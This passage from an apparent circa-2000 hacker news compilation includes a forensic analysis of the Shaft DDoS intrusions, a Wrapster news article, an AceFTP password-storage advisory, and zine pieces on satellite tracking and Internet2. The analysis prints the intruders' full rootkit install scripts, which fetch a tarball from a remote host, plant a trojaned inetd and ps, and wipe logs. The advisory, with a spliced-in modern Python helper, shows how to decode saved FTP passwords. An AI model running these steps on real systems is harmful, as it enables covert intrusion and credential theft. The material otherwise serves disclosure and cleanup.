for i in `cat $1`; do (./bd.sh $i &);done

-rwxr-xr-x   1 0        0             192 Aug  8  1999 bdpipe.sh
This is a file that is used to upload and install their trojans and rootkits on a SPARC machine, as well as delete the logs and such. It copies neet.tar over to the target machine, runs the script bd, and cleans up their work. Here is the code for the script:

#!/bin/sh
echo "cd /tmp;"
echo "rcp user@host:neet.tar ./;"
sleep 4
echo "tar -xvf neet.tar;"
sleep 4
echo "./bd;"
sleep 10
echo "rm -rf neet.tar bd update*;"
sleep 10
echo "exit;"

It appears that they already have a root shell by the time this script is run. Getting the root shell could very well be the contents of the real bd.sh.

-rwxr-xr-x   1 0        0          102400 Aug  7  1999 neet.tar
This is a tar file that contains 4 other files: bd (a shell script), ps, update, and doc (three SPARC executables).

-rwx------   1 510      510          1076 Aug  5  1999 bd
This is a shell script. This is the executable that is run by the other scripts once a system is compromised. This script does a number of things. First of all it copies in its trojaned version of inetd. Secondly it removes most of the log files on the system that would implicate them. Then it runs their trojaned inetd and tests it with a telnet session (presumably to test the backdoor). Then it kills inetd, nfs, and ttdb. Next it runs their update program. Finally it copies their ps program to replace the current system one.
Here is the full source of this script:

unset HISTFILE; unset SAVEHIST
cp doc /usr/sbin/inetd;
chown root /usr/sbin/inetd;
chgrp root /usr/sbin/inetd;
touch 0716000097 /usr/sbin/inetd;
rm -rf doc /tmp/bob /var/adm/messages /usr/lib/nfs/statd /usr/openwin/bin/rpc.ttdb* /usr/dt/bin/rpc.ttdb*
rm -rf /var/log/messages /var/adm/sec* /var/adm/mail* /var/log/mail* /var/adm/sec*
rm -rf /usr/openwin/bin/rpc.cmsd
rm -rf /usr/dt/bin/rpc.cmsd
/usr/sbin/inetd -s;
/usr/sbin/inetd -s;
telnet localhost;
/usr/sbin/inetd -s;
ps -ef | grep inetd | grep bob | awk '{print "kill -9 " $2 }' > boo
chmod 700 boo
./boo
ps -ef | grep nfs | grep statd | awk '{print "kill -9 " $2 }' > boo
chmod 700 boo
./boo
ps -ef | grep ttdb | grep -v grep | awk '{print "kill -9 " $2 }' > boo
chmod 700 boo
./boo
rm -rf boo
mkdir /usr/man/tmp
mv update ps /usr/man/tmp
cd /usr/man/tmp
echo 1 \"./update -s -o output\" > /kernel/pssys
chmod 755 ps update
./update -s -o output &
cp ps /usr/ucb/ps
mv ps /usr/bin/ps
touch 0716000097 /usr/bin/ps /usr/ucb/ps
cd /
ps -ef | grep bob | grep -v grep
ps -ef | grep stat | grep -v grep
ps -ef | grep update

Section 3: What You Can Do
==========================

We have, we hope, outlined methods for administrators to examine their systems for compromise by the distributors of the Shaft DDoS tool. A combination of a generic rootkit together with the DDoS package created a ring of machines which could be used to disrupt large network segments.

The most important thing is what is repeatedly said -- apply the vendor patches for security updates and keep your system current. Access was gained, no doubt, through well known holes which had patches released some time before by the vendor. This simple action would have prevented most of the nodes of the tool from being acquired. Secondly, any alert system administrator would have noticed the performance of the machine degrade for no apparent reason.
The local administrators of this node complained of crashes and performance problems of this server, yet were not qualified administrators. This is a standard problem, and one that can be easily avoided by training or hiring competent administrators. While the steps we outlined above go beyond these simple, basic system level administration actions, prevention of this kind of compromise is easily done. Any organization should facilitate the spread of vendor supplied security patches.

As noted in the introduction, we have attempted to contact the administrators of the domains listed in the target lists for the distribution of the toolkit or in the records of where the intruders connected. We are providing this analysis to the community in an effort to facilitate the cleanup from this ring of intrusions. It spreads worldwide, including Europe and the Pacific Rim, focusing largely on academic institutions. We have appreciated the response from the community when contacted, and offer to help in any additional ways.

Special thanks to George Weaver from PSU for some of his analysis on the SPARC trojans we found.

Section 4: Selected References
==============================

Dietrich, Sven: Shaft Analysis: http://sled.gsfc.nasa.gov/~spock/shaft_analysis.txt
nmap: http://www.insecure.org/nmap
netcat: ftp://coast.cs.purdue.edu/pub/tool/unix/netcat

@HWA

112.0 Wrapster, the Napster hack fires up the trading fires.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Submitted by: Dragos Ruiu

(You didn't have to stare too hard at the crystal ball to see this one coming. Or the truly anonymous napster clones a la gnutella that will be next. --dr)

Napster hack allows free distribution of software, movies
By John Borland
Staff Writer, CNET News.com
March 22, 2000, 4:15 p.m. PT

update

A new program has been posted on the Internet that transforms a popular music-trading network into a full-blown online swap meet capable of trading videos and software.

The program, dubbed Wrapster, has been available for downloading since yesterday. According to its developer, Wrapster allows any kind of file to be listed and traded over the Napster network, which was designed to recognize only MP3 music files. CNET News.com was able to use the program to locate and download several different types of files through Napster.

A source at Napster said company executives are aware of Wrapster but have not done anything to block its use.

Wrapster joins a growing list of programs allowing the quick, free and wide distribution of illegally copied files. The trend is bad news for record companies, movie studios and software companies that have fought hard to keep their wares from being pirated online.

Programs such as Wrapster and Nullsoft's Gnutella, which mimic and expand on Napster, are quickly speeding the erosion of copyright protections online, leaving copyright holders scrambling to keep up.

"(Copyright holders) are aggressively pursuing the issue in the courts," said Peter Schalestock, an attorney with Perkins Coie. "They'd like to keep up with the technology, but that is turning into an arms race."

Napster, a program designed to let Internet users swap music files with one another, has quickly moved to the heart of the controversy over pirated music and online copyrights.
The software allows people to share a library of MP3 music files with anyone else on the Napster system and to freely download songs directly from others' computers. Napster's ease of use and the huge selection of music available through the system have made it a favorite among college students and other communities with high-speed Internet connections. Thousands of people can frequently be found on the network in the evenings, often sharing nearly a million songs with their peers.

This has infuriated the recording industry, which views Napster as a tool for piracy. The Recording Industry Association of America (RIAA) has sued the company, charging that its software is facilitating the illegal distribution of material. The industry is asking courts for a potentially huge sum of $100,000 per illegally distributed song.

"The overwhelming majority of the MP3 files offered on Napster are infringing," the RIAA says on a Web page explaining its position. "We believe Napster knows this and even encourages it."

To this point, the turmoil has been caused simply by the distribution of music files. Wrapster raises the stakes, however.

The Wrapster program tricks the Napster software into thinking that any file or set of files, including items such as software, videos or games, are MP3 files. Its author, identified as "Octavian" in the program's "about" file, suggests using the software as a means for trading programs such as Windows 2000. Octavian could not be reached for comment.

While aware of Wrapster, executives at Napster do not yet see it as a problem.

"They really see it as something that's benign right now," said Dan Wool, a spokesman for Napster. "Until it poses some kind of problem, they'll just keep the status quo."

Napster proponents note that Wrapster's search capabilities aren't unique online. A less well-known program dubbed iMesh allows people to swap music, video and other multimedia files.
That provides a broader range of options than Napster itself, which only supports MP3 files, but falls short of the capabilities of the new Wrapster technique.

The software also has spawned imitators offering expanded features. Programmers at Nullsoft, the digital music player company recently acquired by America Online, unveiled an open-source effort that, like Wrapster, would allow any kind of file to be shared. Although AOL quickly pulled the project from its site, the code is available elsewhere, and the project may move ahead independently.

"Other programs have already tried to imitate Napster's system and even taken it a step further," said Wayne Chang, a Haverhill, Mass., student who manages Napster's online community bulletin boards. "Wrapster is just ripping off the same idea, except this time disguising the files as the only media that Napster currently recognizes."

The movie and software industries are watching the RIAA's experience closely, aware that they'll ultimately be subjected to the same pressure. They don't face the same risk of widespread piracy today because high-speed Internet connections still aren't common enough to make numerous downloads of their products feasible.

An audio MP3 file generally takes up to half an hour to download over a dial-up connection and just seconds over a cable or DSL modem. A file such as Windows 2000 or a Hollywood movie, however, could take all day over an ordinary modem and potentially hours even over a fast connection.

Nevertheless, the studios and software manufacturers are doing their best to protect their works against copying and to threaten potential pirates with high-stakes lawsuits.

"It's an arms race as long as someone is trying to get around (copyright protections)," said Rich Taylor, vice president of public affairs for the Motion Picture Association of America (MPAA).
"The only things that are preventing a full-blown explosion of video entertainment on the Net are the lack of high-speed connections and the need to secure that digital product."

--
dursec.com / kyx.net - we're from the future http://www.dursec.com
learn kanga-foo from security experts: CanSecWest - May 10-12 Vancouver
Speakers: Ken Williams/E&Y, Marty Roesch/Hiverworld, Fyodor/insecure.org, RainForestPuppy/wiretrip.net, Theo de Raadt/OpenBSD, Max Vision/whitehats.com

@HWA

113.0 AceFTP vulnerability by Armour
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Source: Armour (email)
http://www.2600.org.au/advisories/aceftp-032000.txt

Vulnerability in AceFTP's Password Storage
-------------------------------------------
by Armour - March 2000

Intro:
------
Following black-hand's advisory from November 1999/January 2000 on password storage, it was discovered that AceFTP uses a similar character substitution for local storage of user passwords. Such storage is no better than a plaintext file containing the passwords.

Applies to:
-----------
AceFTP 2.4a - not tested on earlier versions.

Discussion:
-----------
AceFTP stores user passwords in the Sites.ini file, typically located at:
(C:\Program Files\AceExpertFTP\Sites.ini)

Exploit:
--------
Entering a password of abcdefghijklmnopqrstuvwxyz, we are able to derive the letter substitution, printed below:

A= CB   B= C8   C= C9   D= CE   E= CF   F= CC   G= CD
H= C2   I= C3   J= C0   K= C1   L= C6   M= C7   N= C4
O= C5   P= DA   Q= DB   R= D8   S= D9   T= DE   U= DF
V= DC   W= DD   X= D2   Y= D3   Z= D0

Here are the contents of a sample Sites.ini file:

[multu]
Host=hhhh
Anonymous=0
User=h
SavePassword=1
Password=şCBC8C9CECFCCCDC2C3C0C1C6C7C4C5DADBD8D9DEDFDCDDD2D3D0
HostFolder=
Port=21
Firewall=1
LocalFolder1=
LocalFolder2=
LocalFolder3=
Comments=""

Working backwards with the substitution table above, we find that şCBC8C9CECFCCCDC2C3C0C1C6C7C4C5DADBD8D9DEDFDCDDD2D3D0 represents abcdefghijklmnopqrstuvwxyz.
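The substitution table shows why this storage is "no better than a plaintext file": every stored byte is a fixed function of the plaintext byte, with no key involved. The audit helper below is an added example, not part of Armour's advisory. The table is copied from the advisory; the observation that each entry equals the plaintext byte XOR 0xAA is an inference added here, and the code verifies it against the table rather than assuming it.

```python
"""Audit AceFTP 2.4a Sites.ini password storage (added example)."""
import re

# The advisory labels rows A..Z, but the password typed was lower-case
# abcdefghijklmnopqrstuvwxyz, so the hex values correspond to lower-case bytes.
ADVISORY_TABLE = {
    "a": "CB", "b": "C8", "c": "C9", "d": "CE", "e": "CF", "f": "CC", "g": "CD",
    "h": "C2", "i": "C3", "j": "C0", "k": "C1", "l": "C6", "m": "C7", "n": "C4",
    "o": "C5", "p": "DA", "q": "DB", "r": "D8", "s": "D9", "t": "DE", "u": "DF",
    "v": "DC", "w": "DD", "x": "D2", "y": "D3", "z": "D0",
}
XOR_KEY = 0xAA   # inferred from the table, checked by table_is_single_byte_xor


def table_is_single_byte_xor(table, key=XOR_KEY):
    """True if every advisory entry equals ord(plaintext) ^ key, i.e. the
    "substitution" is one constant XOR with no secret material at all."""
    return all(int(stored, 16) == ord(plain) ^ key for plain, stored in table.items())


def unwrap_password(field_value):
    """Reverse the stored form. The sample line begins with a stray non-hex
    character, so only the trailing run of hex digit pairs is decoded."""
    m = re.search(r"(?:[0-9A-Fa-f]{2})+$", field_value)
    if not m:
        return ""
    return bytes(b ^ XOR_KEY for b in bytes.fromhex(m.group(0))).decode("latin-1")


# Constructed from the sample Sites.ini in the advisory (\u015f is the stray
# leading character shown there).
SAMPLE_SITES_INI = """[multu]
Host=hhhh
Anonymous=0
User=h
SavePassword=1
Password=\u015fCBC8C9CECFCCCDC2C3C0C1C6C7C4C5DADBD8D9DEDFDCDDD2D3D0
HostFolder=
Port=21
"""


def audit_sites_ini(text):
    """Return one (section, user, host, recovered_password_length) tuple per
    site with SavePassword=1: each is a credential exposed to anyone who can
    read the file, which is the advisory's point."""
    exposed, section, fields = [], None, {}

    def flush():
        if section and fields.get("SavePassword") == "1":
            exposed.append((section, fields.get("User", ""), fields.get("Host", ""),
                            len(unwrap_password(fields.get("Password", "")))))

    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            flush()
            section, fields = line[1:-1], {}
        elif "=" in line:
            key, value = line.split("=", 1)
            fields[key] = value
    flush()
    return exposed
```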
If an intruder has network or physical access to the Sites.ini file on your hard drive, then your passwords are compromised. The intruder will be able to extract all necessary information from the file to break into your account(s).

Contact:
--------
I can be contacted on armour@swish.bur.st

-Armour

@HWA

114.0 Pursuit Zine #1 (Aug 99)
~~~~~~~~~~~~~~~~~~~~~~~~

Something I seem to have missed, looks like a one off, so I'll preserve it here, you UK phreaks should like this, among others it covers a few things of general interest, have a gander. - Ed

XXXX X XXXX XX X X XX XXXX XXXX X X XX XXXXX XX XX XX XX XXX XX XX XX XX XX XXX XX XX XX XX XXX XXX XX XX XX XXXXXX XX XX XX XXX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XXX X XXXXX XXX XXXX XX XX

[ P U R S U i T - a u g 9 9 ]

Index for this issue of PURSUiT

[0x00] Introduction by the staff
[0x01] Editor's notes by bxj
[0x02] Internet2 (i2) and Next Generation Internet (NGI) by Cyphunk
[0x05] AXS Script Makes WebServer Vulnerable by f0bic
[0x06] Boxing in the UK (series) by Oktal
[0x07] Introduction to firewalls by deadline
[0x08] The FileThief exploit by Mister-X and Alkatraz
[0x09] PURSUiT News update

If you have an article you want us to publish, please e-mail it to bxj, foney_op or Cyphunk and after we read it we will decide whether to publish it in PURSUiT or not. In either case, the writer will be informed. I (bxj) can be contacted at , e-mails to f0bic can be sent to and Cyphunk can be e-mailed to if needed. We all can be reached on the UnderNet IRC network, in the channels #HackTech #HackUK and #KIP.

A note for Phrack editors: We come in peace.
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSU
iT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PUR
SUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][P
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`
   Well, there is not much to tell, just read the editor's notes for
   information on the zine, and on each issue.

   We all would like to thank the following people for helping and
   making this zine possible:

   Bill Clinton, Al Gore (hey, he invented the net), Monica Lewinsky,
   Linda Tripp, Jay Leno, George Lucas, the New York Police,
   Jack the Ripper (the one who cut people), the guy who invented
   air-conditioning, the guy who invented sneakers, Bose Inc.,
   and the rest of the world, except the ones we really really hate.

   Yeah, this one was just to fill up space, so just ignore it, and
   we were just kidding about the guy who invented sneakers.

   Don't forget to read the news at the end of the zine.
`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

 _______________________
[_______________________]
[                       ]
[     Editor's notes     ]
[_______________________]
[_______________________]

What is PURSUiT?

PURSUiT is about information. About knowledge. Knowledge is not power, it's an advantage. Information is the real power. We will supply information, and educate on how to use that information. We will supply knowledge, and guide how to control that knowledge.
PURSUiT is here to share information, to teach the world what really is going on in the underground. No, we will not teach how to make a homemade atom bomb. And no, we will not instruct on how to kill your neighbors. We will tell you the stuff that really matters.

A little background.

PURSUiT started somewhere in 1999, as an idea to get the old-school days back. To be a real, informative zine. We gathered some of the most skilled individuals of this industry, and became one. A smart man once said, that a small group of skilled individuals, excellent with their performance and one with their cause, are better than a whole army. Commandos, they called it. Well, I believe PURSUiT are the commandos of today's digital world.

Remember the old days, the days of the BBSs, the telecommunications and computers revolution, the days when "Windows" was not a fluent term in more than 80% of Earth's population, the days when there were almost no script kiddies, when the Internet was not a "super-highway" and when Geocities was not formed yet. The days when true Hackers lived. The days of learning, days of information and days of sharing.

PURSUiT is here to return these days. PURSUiT is bringing back the old-school.

Peace out, and keep it real, always,
--bxj.

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
x                                                                  x
x                    Tracking Satellites Basics                    x
x                                                                  x
x                          By Overfien                             x
x                                                                  x
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

There are 3 basic types of orbits you should be aware of when tracking satellites.

1) Low altitude circular orbits used by phase 2 satellites
2) Elliptical orbits as used by phase 3 sats.
3) Spacecraft and geostationary orbits planned for phase 4 satellites

Satellites are moving targets, so when a ground station uses directional antennas, aiming information must be available. Your average daily access time for a satellite is an important quantity in determining how useful the satellite will be to you. A low-altitude satellite (such as SBID, Fuji-OSCAR 20, RS-10/11 or a microsat) will generally be in range for 25 minutes or less each time it passes by. A satellite in a high-altitude elliptical orbit, as used for phase 3 spacecraft (such as VBeekon, OSCAR 10 and 13), behaves very differently. It will provide one or two passes per day, but the total access time will be (very roughly) 12 hours for Northern hemisphere stations. A geostationary satellite appears to hang motionless in the sky. If it's in range you'll have access to it 24 hours per day (unless the weather really sucks). If it's out of range you'll never see it.

Satellite enthusiasts wishing to track a satellite are interested in specific information. They want to know:

1) When the satellite will be in range; more specifically times for AOS (acquisition of signal) and LOS (loss of signal) for each pass.
2) Where to aim the antenna (azimuth and elevation) at any time.
3) The regions of the earth that have access to the satellite.

There are two main methods of tracking, which are the graphic method and the computer method. I would like to focus on the computer method. Tracking software naturally answers the basic tracking questions: it will tell you when the satellite is in range and provide you with antenna pointing data.
For example, at each specified time the program may list range (the distance between your station and the satellite), the Doppler shift for the mode you specify (which helps you locate your downlink), the height of the satellite (for elliptical orbits this varies), the phase or mean anomaly (a number that tells how close to you the satellite's antennas are currently aimed), predicted signal levels (on the downlink), path delay time (often labeled echo) and an orbit number (for reference purposes I believe - no effect on tracking).

Let's look at the input the computer requires. Naturally it will need the location of your ground station in terms of latitude and longitude. Some newer programs may even ask for your height above sea level (this shouldn't have any observable effect for 99.99% of amateur/satellite tracking programs), so even if you live in Seattle and have a monster EME antenna, you can just enter "0" or some approx. "#" if you don't know the correct value. The program also has to know the precise orbit of the satellite you're interested in via orbit size, shape, orientation with respect to the earth/stars. This is called orbital elements. Now you're basically ready to track.

For example, when I boot up my "sat box", basically one of my boxes just used for tracking, a main menu pops up that asks:

1) Do you want Batch tracking data
2) Do you want real-time tracking data
3) Do you want to modify parameters
4) Move to graphical interface
5) Exit program

I respond by typing a single number (perhaps followed by the enter key). If I respond "1" to obtain Batch tracking data, the program needs to know which sat. you're interested in, and the date and time to start the calculations. We now take a look at the Batch output provided by a typical program.
I am using the new version of IWI98:

ADLMIL 3
Ground Station: lat=39*N, long=77*W, Ht=0km
DAY # 602  - - - Friday, August 20 - - - 1999

UTC    AZ    EL    Doppler   Range
HHMM   DEG   DEG   HZ        KM
1145   167    5    -         18353
1200   166   11    -1867     20664
1215   165   16    -1733     22773
1230   166   21    -1596     24694

The heading identifies the satellite "ADLMIL 3" (HEH, I promise it's not a military satellite ;-)) and my ground station location (which I had to change for unexplainable reasons). The first 3 columns of the table show time, azimuth and elevation. ADLMIL 3 will come in range sometime between 1145 and 1200 UTC and remain in range for about 9.5 hours. Column 4 provides data on Doppler shift. At 1200 UTC a signal coming through the mode B transponder will appear 1867 Hz lower than predicted using the transponder frequency. Because of the algorithm being used to compute Doppler shift, no value is provided for 1145 UTC, the first time the satellite comes into range.

Alright, just as there's a jargon for practically everything, there's also one for "Satellite Tracking". Here it is broken down:

Access range (acquisition distance)
Acquisition distance: Maximum distance between the subsatellite point and ground station at which access to spacecraft is possible
AOS (Acquisition Of Signal)
Apogee: Point on orbit where satellite height is maximum
Azimuth: Angle in the horizontal plane measured clockwise with respect to North (North = 0*)
Epoch (Epoch time): A reference time at which orbital elements are specified
EQX (ascending node)
Ground track (subsatellite path): Path on surface of earth traced out by SSP as satellite moves through space
Increment (longitudinal increment)
LOS (Loss Of Signal)
Node: Point where satellite ground track crosses the equator
Pass (satellite pass)
TCA (Time of Closest Approach): Time at which satellite passes closest to a specific ground station during orbit of interest

Well, this completes my text on satellite tracking basics. Expect to see more articles in the future; until then, "watch the sky"!!
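The glossary's "acquisition distance" and the azimuth/elevation columns of the batch table above all fall out of one piece of geometry: the central angle between the ground station and the sub-satellite point. The code below is an added example, not the article's or any tracking program's code; it assumes a spherical Earth of radius 6371 km, takes the sub-satellite point and height as inputs (a real program derives them from the orbital elements), and the station/satellite figures in the usage are constructed, not the ADLMIL 3 table.

```python
"""Ground-station look angles: acquisition distance, azimuth, elevation, range
(added example, spherical-Earth approximation)."""
import math

R_EARTH_KM = 6371.0


def central_angle_rad(lat1, lon1, lat2, lon2):
    """Angle at Earth's centre between two surface points; degrees in,
    north and east positive."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dl = math.radians(lon2 - lon1)
    c = math.sin(p1) * math.sin(p2) + math.cos(p1) * math.cos(p2) * math.cos(dl)
    return math.acos(max(-1.0, min(1.0, c)))   # clamp against rounding


def acquisition_distance_km(height_km):
    """Maximum great-circle distance from station to sub-satellite point at
    which the satellite is still above the horizon. The satellite lies on the
    station's horizon plane exactly when cos(gamma) = R / (R + h)."""
    return R_EARTH_KM * math.acos(R_EARTH_KM / (R_EARTH_KM + height_km))


def azimuth_deg(lat1, lon1, lat2, lon2):
    """Initial bearing from station to sub-satellite point, clockwise from
    North, 0..360 (the glossary's azimuth)."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dl = math.radians(lon2 - lon1)
    y = math.sin(dl) * math.cos(p2)
    x = math.cos(p1) * math.sin(p2) - math.sin(p1) * math.cos(p2) * math.cos(dl)
    return math.degrees(math.atan2(y, x)) % 360.0


def look_angles(station, ssp, height_km):
    """Return (azimuth_deg, elevation_deg, range_km, in_range) for a station
    (lat, lon) and sub-satellite point (lat, lon) at the given height."""
    g = central_angle_rad(*station, *ssp)
    ratio = R_EARTH_KM / (R_EARTH_KM + height_km)
    # Elevation from the plane geometry of station, satellite and Earth centre.
    el = math.degrees(math.atan2(math.cos(g) - ratio, math.sin(g)))
    # Slant range by the law of cosines on the same triangle.
    rng = math.sqrt(R_EARTH_KM ** 2 + (R_EARTH_KM + height_km) ** 2
                    - 2 * R_EARTH_KM * (R_EARTH_KM + height_km) * math.cos(g))
    return azimuth_deg(*station, *ssp), el, rng, el > 0.0


if __name__ == "__main__":
    # Constructed case: the article's station (39N, 77W) looking at a
    # geostationary satellite parked over its own meridian.
    az, el, rng, ok = look_angles((39.0, -77.0), (0.0, -77.0), 35786.0)
    print(f"AZ {az:.0f} EL {el:.1f} range {rng:.0f} km in_range={ok}")
    print(f"LEO 800 km acquisition distance: {acquisition_distance_km(800.0):.0f} km")
```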
Overfien@hushmail.com

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
||PURSUiT is proud to present..                      ||
||                                                   ||
||  Internet2 (i2) and Next Generation Internet (NGI)||
||                                                   ||
||  Compiled by Cyphunk                              ||
||                                                   ||
=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=

-----------------------------------------------------
- Internet2 (i2) and Next Generation Internet (NGI) -
-----------------------------------------------------

Internet2 and NGI are two advanced network initiatives by the US government (for NGI) and UCAID (University Corporation for Advanced Internet Development, for i2). The key here is initiative. What I mean is that you won't find physical networks that are called Internet2 and NGI. Both NGI and i2 run over existing high speed US Backbone networks such as the vBNS, Abilene, ESNet and many others (discussed later). The only real thing that makes i2 and NGI different from each other is who is in charge. You will see many NGI and i2 peers that are registered under both initiatives.

The requirements for becoming a peer on one of these networks are:

1) You have a project that requires very reliable and high-speed connections to other i2 peers.
2) You have a lot of money.

The reason for these initiatives was/is:

1) To foster high speed applications which cannot run on the existing Internet and need a guaranteed connection.
2) To develop smarter network services and ways of guaranteeing bandwidth and latency rates.
3) To increase collaboration of National-to-National and National-to-International research departments (commercial, academic and governmental).

A question that may arise is: "Why not just upgrade the existing Internet and use that as the platform for advanced research?"
The reason this was not done is because it has become obvious over time that no matter how much bandwidth you throw at the Internet it will be over used. So, instead of thinking BIGGER the NGI and i2 initiatives are mainly about thinking SMARTER. These networks are private to their peers and those peers must have a Research and Development related purpose for being there. This cuts out the general, bandwidth sucking, public right from the start. In order to keep the i2 and NGI peers from causing the same problems amongst themselves, advanced services and "Quality of Service" (QoS) systems and policies have been developed and put in place over these networks to keep one peer from stepping on the toes (line quality) of another.

The end goal of many of the advanced applications and technologies being developed by i2 and NGI peers is to have them introduced to the public and commercialized through places such as the internet. Types of applications already being developed involve TeleImmersion and TeleMedicine (to think of a few).

After thinking and working *smarter* these networks will go *bigger* and faster. Amongst the goals of i2 and NGI is to develop the fastest and most efficient networks on the planet to "further the US lead in the global IT market" (whatever). To do so, both sides will work together on finding ways to work more efficiently and develop faster hardware devices. When at i2 and NGI conferences you may hear a lot of talk about TeraPOP's (Terabit Points of Access). Though there are no TeraPOP's out there yet they are definitely on the horizon (a few years off).

Practically all of the literature on the net concerning i2 and NGI is incomplete. The problem is that most of the papers are in M$ PowerPoint format, which really does no good except for the person who created it. It's like looking at teachers' notes when you're not the teacher; it's not helpful. I hope to make this somewhat complete and understandable.
However, considering that many of the pieces of these two networks are still under development, don't be surprised if there are some gaps and you finish with more questions than you started with. My one request, however, is that you e-mail me at: mindmore@mindless.com with the questions that this article may raise and any comments/corrections you may have. This article attempts to detail the services and the goals of both NGI and i2. I'll try not to bore you though :)

Note: It helps if you already have an understanding of Networking (OSI Layers, Protocols, devices and the like) to understand the details of i2 and NGI. Also, I realize that there are probably a lot of grammar errors, thanks for bearing with me.

This paper is split up into 4 sections. The first discusses the Services provided by NGI and i2 (QoS, Multicasting, and IPv6). The second discusses i2 and NGI separately, covering the characteristics of the two individually. The third discusses the physical characteristics of the networks that the i2 and NGI peers connect through. The fourth, brief, section discusses security issues that I see.

I. Services
------------------------------------------------------------------------

As I said before, both i2 and NGI support and are active in developing the standards for IPv6, QoS and Multicasting. I will try to get into each network's implementation of these services later. The purpose of this section is to introduce you to the services I just mentioned so that you have a basic understanding of them.

> IPv6 in brief

IPv6, also known as IPng (IP Next Generation), is the *upgrade* to the currently overkilled IPv4 addressing protocol. These addresses are called IP addresses and every computer on the net must have a unique IP address to communicate on the Internet. There are a lot of computers on the net and very soon there won't be enough IPv4 addresses left for them. IPv4 addresses are 32-bit addresses. This allows for 4,294,967,296 possible numbers.
However, I'm guessing that after segmentation we get around 1.5 billion or so addresses. When this protocol was defined it was thought that a 32-bit address would be plenty. After all, how many computers could the small group of DARPA Geeks own :). However, the Internet became something more than a high speed government and academic network and moved into the public/global domain. Today we are coming to a point where we just don't have enough IP addresses. I mean, call your ISP and ask them how much it would cost to get your own Static IP address from them. For me, with my ISP, it is $20 more a month. That is a big jump from FREE.

So, the guys and gals at the IETF (Internet Engineering Task Force) have been working on IPv6, which will fix these problems. IPv6 gives us 128-bit addresses represented in binary, of course, and Hexadecimal. 128 bits give -18,446,744,073,709,551,616 squared- possible numbers, which should last us until the transition of the Internet from being public/global to becoming extraterrestrial/public/universal.

There is more to the protocol than just an increased address space, however. The header structure of the IP packet has changed. IPv6 headers are somewhat larger than IPv4 headers but IPv6 headers are much more simplified. For instance, IPv4 header sizes can vary whereas IPv6 headers are always 40 bytes. Making the headers a fixed size allows for easier processing. IPv6 has also taken away some of the unused fields that were in IPv4, making it simpler. It has also added optional fields that can be used for increased security. For example, IPv6 encryption headers indicate which encryption keys to use, and carry other handshaking information. For more info check the IPv6 related RFCs, there are a ton of them.

> QoS

One thing that people are starting to realize is that no matter how much bandwidth you throw to the public or private sector, they always use it and over use it.
Though one objective of i2 and NGI is to increase bandwidth capacity, the other is to manage or regulate who has access to that bandwidth, how much of it and the quality of it. The Internet currently runs as a "Best Effort" service network. This means that if the TIT (Tokyo Institute of Technology) NanoTech department needs 5mbps with no more than a 200ms delay for a joint project with MIT (Massachusetts Institute of Technology) over the Internet, they will rely on pure luck to get what they need: luck that the lines from them to MIT will not be saturated with traffic at that time. This is a big problem, because this sort of luck rarely ever happens over the Internet. We need to develop a way to guarantee them the bandwidth and quality they need for that period of time. This is done through QoS (Quality of Service), whose development is primarily the job of the IETF (Internet Engineering Task Force) QoS workgroup. One objective of NGI and i2 is to guarantee end to end QoS, which means that whether it takes 10 hops to get from TIT in Tokyo to MIT or 2 hops, they will be guaranteed 5mbps, 200ms, all the way. Currently there are two basic standards being used for QoS: the RSVP protocol and DiffServ.

>> RSVP (Resource ReSerVation Protocol)

RSVP guarantees end to end bandwidth reservations and delay times from node to node. DiffServ works more on a BB (Bandwidth Broker, ISP)-to-BB basis or Network-to-Network basis, whereas RSVP works on a node to node basis. This allows for tighter QoS and is necessary for Multicasting, but is not as flexible as DiffServ. RSVP supports multicast groups (discussed later) and RSVP operates on top of IPv4 or IPv6, acting like a layer 4 protocol. RSVP also acts like a routing protocol, though it does not take the place of existing routing protocols; it operates on top of them (adding features where needed). RSVP causes a higher strain on the network due to the fact that there is checking going on from node to node.
For more information on RSVP check out rfc1633 and rfc2205.

>> DiffServ (Differentiated Services)

